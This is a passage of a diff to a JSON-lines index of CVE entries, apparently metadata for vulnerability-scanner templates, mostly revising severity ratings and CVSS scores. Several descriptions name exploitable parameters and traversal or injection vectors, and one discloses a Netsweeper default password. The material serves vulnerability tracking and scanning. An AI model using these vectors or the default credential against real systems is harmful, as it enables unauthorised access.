Execution","Severity":"critical","Description":"HTTP File Server before 2.3c is susceptible to remote command execution. The findMacroMarker function in parserLib.pas allows an attacker to execute arbitrary programs via a %00 sequence in a search action. Therefore, an attacker can obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2014/CVE-2014-6287.yaml"} -{"ID":"CVE-2014-6308","Info":{"Name":"Osclass Security Advisory 3.4.1 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in OSClass before 3.4.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter in a render action to oc-admin/index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2014/CVE-2014-6308.yaml"} +{"ID":"CVE-2014-6308","Info":{"Name":"Osclass Security Advisory 3.4.1 - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in OSClass before 3.4.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter in a render action to oc-admin/index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2014/CVE-2014-6308.yaml"} {"ID":"CVE-2014-8676","Info":{"Name":"Simple Online Planning Tool \u003c1.3.2 - Local File Inclusion","Severity":"medium","Description":"SOPlanning \u003c1.32 contain a directory traversal in the file_get_contents function via a .. (dot dot) in the fichier parameter.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2014/CVE-2014-8676.yaml"} -{"ID":"CVE-2014-8682","Info":{"Name":"Gogs (Go Git Service) - SQL Injection","Severity":"critical","Description":"Multiple SQL injection vulnerabilities in Gogs (aka Go Git Service) 0.3.1-9 through 0.5.x before 0.5.6.1105 Beta allow remote attackers to execute arbitrary SQL commands via the q parameter to (1) api/v1/repos/search, which is not properly handled in models/repo.go, or (2) api/v1/users/search, which is not properly handled in models/user.go.","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2014/CVE-2014-8682.yaml"} -{"ID":"CVE-2014-8799","Info":{"Name":"WordPress Plugin DukaPress 2.5.2 - Directory Traversal","Severity":"high","Description":"A directory traversal vulnerability in the dp_img_resize function in php/dp-functions.php in the DukaPress plugin before 2.5.4 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the src parameter to lib/dp_image.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2014/CVE-2014-8799.yaml"} +{"ID":"CVE-2014-8682","Info":{"Name":"Gogs (Go Git Service) - SQL Injection","Severity":"high","Description":"Multiple SQL injection vulnerabilities in Gogs (aka Go Git Service) 0.3.1-9 through 0.5.x before 0.5.6.1105 Beta allow remote attackers to execute arbitrary SQL commands via the q parameter to (1) api/v1/repos/search, which is not properly handled in models/repo.go, or (2) api/v1/users/search, which is not properly handled in models/user.go.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2014/CVE-2014-8682.yaml"} +{"ID":"CVE-2014-8799","Info":{"Name":"WordPress Plugin DukaPress 2.5.2 - Directory Traversal","Severity":"medium","Description":"A directory traversal vulnerability in the dp_img_resize function in php/dp-functions.php in the DukaPress plugin before 2.5.4 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the src parameter to lib/dp_image.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2014/CVE-2014-8799.yaml"} {"ID":"CVE-2014-9094","Info":{"Name":"WordPress DZS-VideoGallery Plugin Cross-Site Scripting","Severity":"medium","Description":"Multiple cross-site scripting vulnerabilities in deploy/designer/preview.php in the Digital Zoom Studio (DZS) Video Gallery plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) swfloc or (2) designrand parameter.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2014/CVE-2014-9094.yaml"} -{"ID":"CVE-2014-9119","Info":{"Name":"WordPress DB Backup \u003c=4.5 - Local File Inclusion","Severity":"high","Description":"WordPress Plugin DB Backup 4.5 and possibly prior versions are prone to a local file inclusion vulnerability because they fail to sufficiently sanitize user-supplied input. Exploiting this issue can allow an attacker to obtain sensitive information that could aid in further attacks.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2014/CVE-2014-9119.yaml"} -{"ID":"CVE-2014-9444","Info":{"Name":"Frontend Uploader \u003c= 0.9.2 - Cross-Site Scripting","Severity":"medium","Description":"The Frontend Uploader WordPress plugin prior to v.0.9.2 was affected by an unauthenticated Cross-Site Scripting security vulnerability.","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2014/CVE-2014-9444.yaml"} +{"ID":"CVE-2014-9119","Info":{"Name":"WordPress DB Backup \u003c=4.5 - Local File Inclusion","Severity":"medium","Description":"WordPress Plugin DB Backup 4.5 and possibly prior versions are prone to a local file inclusion vulnerability because they fail to sufficiently sanitize user-supplied input. Exploiting this issue can allow an attacker to obtain sensitive information that could aid in further attacks.\n","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2014/CVE-2014-9119.yaml"} +{"ID":"CVE-2014-9180","Info":{"Name":"Eleanor CMS - Open Redirect","Severity":"medium","Description":"Open redirect vulnerability in go.php in Eleanor CMS allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the QUERY_STRING.\n","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2014/CVE-2014-9180.yaml"} +{"ID":"CVE-2014-9444","Info":{"Name":"Frontend Uploader \u003c= 0.9.2 - Cross-Site Scripting","Severity":"medium","Description":"The Frontend Uploader WordPress plugin prior to v.0.9.2 was affected by an unauthenticated Cross-Site Scripting security vulnerability.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2014/CVE-2014-9444.yaml"} {"ID":"CVE-2014-9606","Info":{"Name":"Netsweeper 4.0.8 - Cross-Site Scripting","Severity":"medium","Description":"Multiple cross-site scripting vulnerabilities in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allow remote attackers to inject arbitrary web script or HTML via the (1) server parameter to remotereporter/load_logfiles.php, (2) customctid parameter to webadmin/policy/category_table_ajax.php, (3) urllist parameter to webadmin/alert/alert.php, (4) QUERY_STRING to webadmin/ajaxfilemanager/ajax_get_file_listing.php, or (5) PATH_INFO to webadmin/policy/policy_table_ajax.php/.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2014/CVE-2014-9606.yaml"} {"ID":"CVE-2014-9607","Info":{"Name":"Netsweeper 4.0.4 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in remotereporter/load_logfiles.php in Netsweeper 4.0.3 and 4.0.4 allows remote attackers to inject arbitrary web script or HTML via the url parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2014/CVE-2014-9607.yaml"} -{"ID":"CVE-2014-9608","Info":{"Name":"Netsweeper 4.0.3 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in webadmin/policy/group_table_ajax.php/ in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2014/CVE-2014-9608.yaml"} +{"ID":"CVE-2014-9608","Info":{"Name":"Netsweeper 4.0.3 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in webadmin/policy/group_table_ajax.php/ in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2014/CVE-2014-9608.yaml"} {"ID":"CVE-2014-9609","Info":{"Name":"Netsweeper 4.0.8 - Directory Traversal","Severity":"medium","Description":"A directory traversal vulnerability in webadmin/reporter/view_server_log.php in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to list directory contents via a .. (dot dot) in the log parameter in a stats action.","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2014/CVE-2014-9609.yaml"} {"ID":"CVE-2014-9614","Info":{"Name":"Netsweeper 4.0.5 - Default Weak Account","Severity":"critical","Description":"The Web Panel in Netsweeper before 4.0.5 has a default password of 'branding' for the branding account, which makes it easier for remote attackers to obtain access via a request to webadmin/.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2014/CVE-2014-9614.yaml"} {"ID":"CVE-2014-9615","Info":{"Name":"Netsweeper 4.0.4 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in Netsweeper 4.0.4 allows remote attackers to inject arbitrary web script or HTML via the url parameter to webadmin/deny/index.php.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2014/CVE-2014-9615.yaml"} {"ID":"CVE-2014-9617","Info":{"Name":"Netsweeper 3.0.6 - Open Redirection","Severity":"medium","Description":"An open redirect vulnerability in remotereporter/load_logfiles.php in Netsweeper before 4.0.5 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the url parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2014/CVE-2014-9617.yaml"} {"ID":"CVE-2014-9618","Info":{"Name":"Netsweeper - Authentication Bypass","Severity":"critical","Description":"The Client Filter Admin portal in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to bypass authentication and subsequently create arbitrary profiles via a showdeny action to the default URL.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2014/CVE-2014-9618.yaml"} -{"ID":"CVE-2015-0554","Info":{"Name":"ADB/Pirelli ADSL2/2+ Wireless Router P.DGA4001N - Information Disclosure","Severity":"high","Description":"ADB (formerly Pirelli Broadband Solutions) P.DGA4001N router with firmware PDG_TEF_SP_4.06L.6 does not properly restrict access to the web interface, which allows remote attackers to obtain sensitive information or cause a denial of service (device restart) as demonstrated by a direct request to (1) wlsecurity.html or (2) resetrouter.html.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-0554.yaml"} +{"ID":"CVE-2015-0554","Info":{"Name":"ADB/Pirelli ADSL2/2+ Wireless Router P.DGA4001N - Information Disclosure","Severity":"critical","Description":"ADB (formerly Pirelli Broadband Solutions) P.DGA4001N router with firmware PDG_TEF_SP_4.06L.6 does not properly restrict access to the web interface, which allows remote attackers to obtain sensitive information or cause a denial of service (device restart) as demonstrated by a direct request to (1) wlsecurity.html or (2) resetrouter.html.","Classification":{"CVSSScore":"9.4"}},"file_path":"http/cves/2015/CVE-2015-0554.yaml"} {"ID":"CVE-2015-1000005","Info":{"Name":"WordPress Candidate Application Form \u003c= 1.3 - Local File Inclusion","Severity":"high","Description":"WordPress Candidate Application Form \u003c= 1.3 is susceptible to arbitrary file downloads because the code in downloadpdffile.php does not do any sanity checks.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-1000005.yaml"} {"ID":"CVE-2015-1000010","Info":{"Name":"WordPress Simple Image Manipulator \u003c 1.0 - Local File Inclusion","Severity":"high","Description":"WordPress Simple Image Manipulator 1.0 is vulnerable to local file inclusion in ./simple-image-manipulator/controller/download.php because no checks are made to authenticate users or sanitize input when determining file location.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-1000010.yaml"} {"ID":"CVE-2015-1000012","Info":{"Name":"WordPress MyPixs \u003c=0.3 - Local File Inclusion","Severity":"high","Description":"WordPress MyPixs 0.3 and prior contains a local file inclusion vulnerability.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-1000012.yaml"} -{"ID":"CVE-2015-1427","Info":{"Name":"ElasticSearch - Remote Code Execution","Severity":"critical","Description":"ElasticSearch before 1.3.8 and 1.4.x before 1.4.3 allows remote attackers to bypass the sandbox protection mechanism and execute arbitrary shell commands via a crafted script to the Groovy scripting engine.","Classification":{"CVSSScore":"10.0"}},"file_path":"http/cves/2015/CVE-2015-1427.yaml"} +{"ID":"CVE-2015-1427","Info":{"Name":"ElasticSearch - Remote Code Execution","Severity":"high","Description":"ElasticSearch before 1.3.8 and 1.4.x before 1.4.3 allows remote attackers to bypass the sandbox protection mechanism and execute arbitrary shell commands via a crafted script to the Groovy scripting engine.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-1427.yaml"} {"ID":"CVE-2015-1503","Info":{"Name":"IceWarp Mail Server \u003c11.1.1 - Directory Traversal","Severity":"high","Description":"IceWarp Mail Server versions prior to 11.1.1 suffer from a directory traversal vulnerability.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-1503.yaml"} -{"ID":"CVE-2015-1579","Info":{"Name":"WordPress Slider Revolution - Local File Disclosure","Severity":"high","Description":"Directory traversal vulnerability in the Elegant Themes Divi theme for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the img parameter in a revslider_show_image action to wp-admin/admin-ajax.php. NOTE: this vulnerability may be a duplicate of CVE-2014-9734.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-1579.yaml"} +{"ID":"CVE-2015-1579","Info":{"Name":"WordPress Slider Revolution - Local File Disclosure","Severity":"medium","Description":"Directory traversal vulnerability in the Elegant Themes Divi theme for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the img parameter in a revslider_show_image action to wp-admin/admin-ajax.php. NOTE: this vulnerability may be a duplicate of CVE-2014-9734.\n","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2015/CVE-2015-1579.yaml"} {"ID":"CVE-2015-1880","Info":{"Name":"Fortinet FortiOS \u003c=5.2.3 - Cross-Site Scripting","Severity":"medium","Description":"Fortinet FortiOS 5.2.x before 5.2.3 contains a cross-site scripting vulnerability in the SSL VPN login page which allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2015/CVE-2015-1880.yaml"} -{"ID":"CVE-2015-2067","Info":{"Name":"Magento Server MAGMI - Directory Traversal","Severity":"high","Description":"Magento Server MAGMI (aka Magento Mass Importer) contains a directory traversal vulnerability in web/ajax_pluginconf.php. that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2015/CVE-2015-2067.yaml"} +{"ID":"CVE-2015-20067","Info":{"Name":"WP Attachment Export \u003c 0.2.4 - Unrestricted File Download","Severity":"high","Description":"The plugin does not have proper access controls, allowing unauthenticated users to download the XML data that holds all the details of attachments/posts on a Wordpress\npowered site. This includes details of even privately published posts and password protected posts with their passwords revealed in plain text.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-20067.yaml"} +{"ID":"CVE-2015-2067","Info":{"Name":"Magento Server MAGMI - Directory Traversal","Severity":"medium","Description":"Magento Server MAGMI (aka Magento Mass Importer) contains a directory traversal vulnerability in web/ajax_pluginconf.php. that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2015/CVE-2015-2067.yaml"} {"ID":"CVE-2015-2068","Info":{"Name":"Magento Server Mass Importer - Cross-Site Scripting","Severity":"medium","Description":"Magento Server Mass Importer plugin contains multiple cross-site scripting vulnerabilities which allow remote attackers to inject arbitrary web script or HTML via the (1) profile parameter to web/magmi.php or (2) QUERY_STRING to web/magmi_import_run.php.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2015/CVE-2015-2068.yaml"} {"ID":"CVE-2015-2080","Info":{"Name":"Eclipse Jetty \u003c9.2.9.v20150224 - Sensitive Information Leakage","Severity":"high","Description":"Eclipse Jetty before 9.2.9.v20150224 allows remote attackers to obtain sensitive information from process memory via illegal characters in an HTTP header.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-2080.yaml"} -{"ID":"CVE-2015-2166","Info":{"Name":"Ericsson Drutt MSDP - Local File Inclusion","Severity":"high","Description":"Ericsson Drutt Mobile Service Delivery Platform (MSDP) 4, 5, and 6 allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the default URI in the Instance Monitor.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2015/CVE-2015-2166.yaml"} -{"ID":"CVE-2015-2196","Info":{"Name":"WordPress Spider Calendar \u003c=1.4.9 - SQL Injection","Severity":"critical","Description":"WordPress Spider Calendar plugin through 1.4.9 is susceptible to SQL injection. An attacker can execute arbitrary SQL commands via the cat_id parameter in a spiderbigcalendar_month action to wp-admin/admin-ajax.php, thus making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2015/CVE-2015-2196.yaml"} -{"ID":"CVE-2015-2755","Info":{"Name":"WordPress AB Google Map Travel \u003c=3.4 - Stored Cross-Site Scripting","Severity":"medium","Description":"WordPress AB Google Map Travel plugin through 3.4 contains multiple stored cross-site scripting vulnerabilities. The plugin allows an attacker to hijack the administrator authentication for requests via the (1) lat (Latitude), (2) long (Longitude), (3) map_width, (4) map_height, or (5) zoom (Map Zoom) parameters in the ab_map_options page to wp-admin/admin.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2015/CVE-2015-2755.yaml"} +{"ID":"CVE-2015-2166","Info":{"Name":"Ericsson Drutt MSDP - Local File Inclusion","Severity":"medium","Description":"Ericsson Drutt Mobile Service Delivery Platform (MSDP) 4, 5, and 6 allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the default URI in the Instance Monitor.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2015/CVE-2015-2166.yaml"} +{"ID":"CVE-2015-2196","Info":{"Name":"WordPress Spider Calendar \u003c=1.4.9 - SQL Injection","Severity":"high","Description":"WordPress Spider Calendar plugin through 1.4.9 is susceptible to SQL injection. An attacker can execute arbitrary SQL commands via the cat_id parameter in a spiderbigcalendar_month action to wp-admin/admin-ajax.php, thus making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-2196.yaml"} +{"ID":"CVE-2015-2755","Info":{"Name":"WordPress AB Google Map Travel \u003c=3.4 - Stored Cross-Site Scripting","Severity":"medium","Description":"WordPress AB Google Map Travel plugin through 3.4 contains multiple stored cross-site scripting vulnerabilities. The plugin allows an attacker to hijack the administrator authentication for requests via the (1) lat (Latitude), (2) long (Longitude), (3) map_width, (4) map_height, or (5) zoom (Map Zoom) parameters in the ab_map_options page to wp-admin/admin.php.\n","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2015/CVE-2015-2755.yaml"} {"ID":"CVE-2015-2807","Info":{"Name":"Navis DocumentCloud \u003c0.1.1 - Cross-Site Scripting","Severity":"medium","Description":"Navis DocumentCloud plugin before 0.1.1 for WordPress contains a reflected cross-site scripting vulnerability in js/window.php which allows remote attackers to inject arbitrary web script or HTML via the wpbase parameter.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2015/CVE-2015-2807.yaml"} -{"ID":"CVE-2015-2863","Info":{"Name":"Kaseya Virtual System Administrator - Open Redirect","Severity":"medium","Description":"Kaseya Virtual System Administrator 7.x before 7.0.0.29, 8.x before 8.0.0.18, 9.0 before 9.0.0.14, and 9.1 before 9.1.0.4 are susceptible to an open redirect vulnerability. An attacker can redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2015/CVE-2015-2863.yaml"} -{"ID":"CVE-2015-2996","Info":{"Name":"SysAid Help Desk \u003c15.2 - Local File Inclusion","Severity":"high","Description":"SysAid Help Desk before 15.2 contains multiple local file inclusion vulnerabilities which can allow remote attackers to read arbitrary files via .. (dot dot) in the fileName parameter of getGfiUpgradeFile or cause a denial of service (CPU and memory consumption) via .. (dot dot) in the fileName parameter of calculateRdsFileChecksum.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-2996.yaml"} -{"ID":"CVE-2015-3035","Info":{"Name":"TP-LINK - Local File Inclusion","Severity":"high","Description":"TP-LINK is susceptible to local file inclusion in these products: Archer C5 (1.2) with firmware before 150317, Archer C7 (2.0) with firmware before 150304, and C8 (1.0) with firmware before 150316, Archer C9 (1.0), TL-WDR3500 (1.0), TL-WDR3600 (1.0), and TL-WDR4300 (1.0) with firmware before 150302, TL-WR740N (5.0) and TL-WR741ND (5.0) with firmware before 150312, and TL-WR841N (9.0), TL-WR841N (10.0), TL-WR841ND (9.0), and TL-WR841ND (10.0) with firmware before 150310. Because of insufficient input validation, arbitrary local files can be disclosed. Files that include passwords and other sensitive information can be accessed.\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2015/CVE-2015-3035.yaml"} -{"ID":"CVE-2015-3224","Info":{"Name":"Ruby on Rails Web Console - Remote Code Execution","Severity":"critical","Description":"Ruby on Rails Web Console before 2.1.3, as used with Ruby on Rails 3.x and 4.x, does not properly restrict the use of X-Forwarded-For headers in determining a client's IP address, which allows remote attackers to bypass the whitelisted_ips protection mechanism via a crafted request to request.rb.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2015/CVE-2015-3224.yaml"} -{"ID":"CVE-2015-3337","Info":{"Name":"Elasticsearch - Local File Inclusion","Severity":"high","Description":"Elasticsearch before 1.4.5 and 1.5.x before 1.5.2 allows remote attackers to read arbitrary files via unspecified vectors when a site plugin is enabled.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2015/CVE-2015-3337.yaml"} +{"ID":"CVE-2015-2863","Info":{"Name":"Kaseya Virtual System Administrator - Open Redirect","Severity":"medium","Description":"Kaseya Virtual System Administrator 7.x before 7.0.0.29, 8.x before 8.0.0.18, 9.0 before 9.0.0.14, and 9.1 before 9.1.0.4 are susceptible to an open redirect vulnerability. An attacker can redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2015/CVE-2015-2863.yaml"} +{"ID":"CVE-2015-2996","Info":{"Name":"SysAid Help Desk \u003c15.2 - Local File Inclusion","Severity":"high","Description":"SysAid Help Desk before 15.2 contains multiple local file inclusion vulnerabilities which can allow remote attackers to read arbitrary files via .. (dot dot) in the fileName parameter of getGfiUpgradeFile or cause a denial of service (CPU and memory consumption) via .. (dot dot) in the fileName parameter of calculateRdsFileChecksum.\n","Classification":{"CVSSScore":"8.5"}},"file_path":"http/cves/2015/CVE-2015-2996.yaml"} +{"ID":"CVE-2015-3035","Info":{"Name":"TP-LINK - Local File Inclusion","Severity":"high","Description":"TP-LINK is susceptible to local file inclusion in these products: Archer C5 (1.2) with firmware before 150317, Archer C7 (2.0) with firmware before 150304, and C8 (1.0) with firmware before 150316, Archer C9 (1.0), TL-WDR3500 (1.0), TL-WDR3600 (1.0), and TL-WDR4300 (1.0) with firmware before 150302, TL-WR740N (5.0) and TL-WR741ND (5.0) with firmware before 150312, and TL-WR841N (9.0), TL-WR841N (10.0), TL-WR841ND (9.0), and TL-WR841ND (10.0) with firmware before 150310. Because of insufficient input validation, arbitrary local files can be disclosed. Files that include passwords and other sensitive information can be accessed.\n","Classification":{"CVSSScore":"7.8"}},"file_path":"http/cves/2015/CVE-2015-3035.yaml"} +{"ID":"CVE-2015-3224","Info":{"Name":"Ruby on Rails Web Console - Remote Code Execution","Severity":"medium","Description":"Ruby on Rails Web Console before 2.1.3, as used with Ruby on Rails 3.x and 4.x, does not properly restrict the use of X-Forwarded-For headers in determining a client's IP address, which allows remote attackers to bypass the whitelisted_ips protection mechanism via a crafted request to request.rb.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2015/CVE-2015-3224.yaml"} +{"ID":"CVE-2015-3337","Info":{"Name":"Elasticsearch - Local File Inclusion","Severity":"medium","Description":"Elasticsearch before 1.4.5 and 1.5.x before 1.5.2 allows remote attackers to read arbitrary files via unspecified vectors when a site plugin is enabled.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2015/CVE-2015-3337.yaml"} {"ID":"CVE-2015-3648","Info":{"Name":"ResourceSpace - Local File inclusion","Severity":"high","Description":"ResourceSpace is prone to a local file-inclusion vulnerability because it fails to sufficiently sanitize user-supplied input.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-3648.yaml"} -{"ID":"CVE-2015-3897","Info":{"Name":"Bonita BPM Portal \u003c6.5.3 - Local File Inclusion","Severity":"high","Description":"Bonita BPM Portal before 6.5.3 allows remote attackers to read arbitrary files via a .. (dot dot) in the theme parameter and a file path in the location parameter to bonita/portal/themeResource.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-3897.yaml"} -{"ID":"CVE-2015-4050","Info":{"Name":"Symfony - Authentication Bypass","Severity":"high","Description":"Symfony 2.3.19 through 2.3.28, 2.4.9 through 2.4.10, 2.5.4 through 2.5.11, and 2.6.0 through 2.6.7, when ESI or SSI support enabled, does not check if the _controller attribute is set, which allows remote attackers to bypass URL signing and security rules by including (1) no hash or (2) an invalid hash in a request to /_fragment in the HttpKernel component.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2015/CVE-2015-4050.yaml"} -{"ID":"CVE-2015-4062","Info":{"Name":"WordPress NewStatPress 0.9.8 - SQL Injection","Severity":"critical","Description":"WordPress NewStatPress 0.9.8 plugin contains a SQL injection vulnerability in includes/nsp_search.php. A remote authenticated user can execute arbitrary SQL commands via the where1 parameter in the nsp_search page to wp-admin/admin.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2015/CVE-2015-4062.yaml"} -{"ID":"CVE-2015-4063","Info":{"Name":"NewStatPress \u003c0.9.9 - Cross-Site Scripting","Severity":"medium","Description":"WordPress NewStatPress plugin before 0.9.9 contains a cross-site scripting vulnerability in includes/nsp_search.php. The plugin allows remote authenticated users to inject arbitrary web script or HTML via the where1 parameter in the nsp_search page to wp-admin/admin.php.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2015/CVE-2015-4063.yaml"} +{"ID":"CVE-2015-3897","Info":{"Name":"Bonita BPM Portal \u003c6.5.3 - Local File Inclusion","Severity":"medium","Description":"Bonita BPM Portal before 6.5.3 allows remote attackers to read arbitrary files via a .. (dot dot) in the theme parameter and a file path in the location parameter to bonita/portal/themeResource.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2015/CVE-2015-3897.yaml"} +{"ID":"CVE-2015-4050","Info":{"Name":"Symfony - Authentication Bypass","Severity":"medium","Description":"Symfony 2.3.19 through 2.3.28, 2.4.9 through 2.4.10, 2.5.4 through 2.5.11, and 2.6.0 through 2.6.7, when ESI or SSI support enabled, does not check if the _controller attribute is set, which allows remote attackers to bypass URL signing and security rules by including (1) no hash or (2) an invalid hash in a request to /_fragment in the HttpKernel component.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2015/CVE-2015-4050.yaml"} +{"ID":"CVE-2015-4062","Info":{"Name":"WordPress NewStatPress 0.9.8 - SQL Injection","Severity":"medium","Description":"WordPress NewStatPress 0.9.8 plugin contains a SQL injection vulnerability in includes/nsp_search.php. A remote authenticated user can execute arbitrary SQL commands via the where1 parameter in the nsp_search page to wp-admin/admin.php.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2015/CVE-2015-4062.yaml"} +{"ID":"CVE-2015-4063","Info":{"Name":"NewStatPress \u003c0.9.9 - Cross-Site Scripting","Severity":"low","Description":"WordPress NewStatPress plugin before 0.9.9 contains a cross-site scripting vulnerability in includes/nsp_search.php. The plugin allows remote authenticated users to inject arbitrary web script or HTML via the where1 parameter in the nsp_search page to wp-admin/admin.php.\n","Classification":{"CVSSScore":"3.5"}},"file_path":"http/cves/2015/CVE-2015-4063.yaml"} {"ID":"CVE-2015-4074","Info":{"Name":"Joomla! Helpdesk Pro plugin \u003c1.4.0 - Local File Inclusion","Severity":"high","Description":"Directory traversal vulnerability in the Helpdesk Pro plugin before 1.4.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the filename parameter in a ticket.download_attachment task.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-4074.yaml"} -{"ID":"CVE-2015-4127","Info":{"Name":"WordPress Church Admin \u003c0.810 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Church Admin plugin before 0.810 allows remote attackers to inject arbitrary web script or HTML via the address parameter via index.php/2015/05/21/church_admin-registration-form/.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2015/CVE-2015-4127.yaml"} -{"ID":"CVE-2015-4414","Info":{"Name":"WordPress SE HTML5 Album Audio Player 1.1.0 - Directory Traversal","Severity":"high","Description":"WordPress SE HTML5 Album Audio Player 1.1.0 contains a directory traversal vulnerability in download_audio.php that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2015/CVE-2015-4414.yaml"} +{"ID":"CVE-2015-4127","Info":{"Name":"WordPress Church Admin \u003c0.810 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Church Admin plugin before 0.810 allows remote attackers to inject arbitrary web script or HTML via the address parameter via index.php/2015/05/21/church_admin-registration-form/.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2015/CVE-2015-4127.yaml"} +{"ID":"CVE-2015-4414","Info":{"Name":"WordPress SE HTML5 Album Audio Player 1.1.0 - Directory Traversal","Severity":"medium","Description":"WordPress SE HTML5 Album Audio Player 1.1.0 contains a directory traversal vulnerability in download_audio.php that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2015/CVE-2015-4414.yaml"} {"ID":"CVE-2015-4632","Info":{"Name":"Koha 3.20.1 - Directory 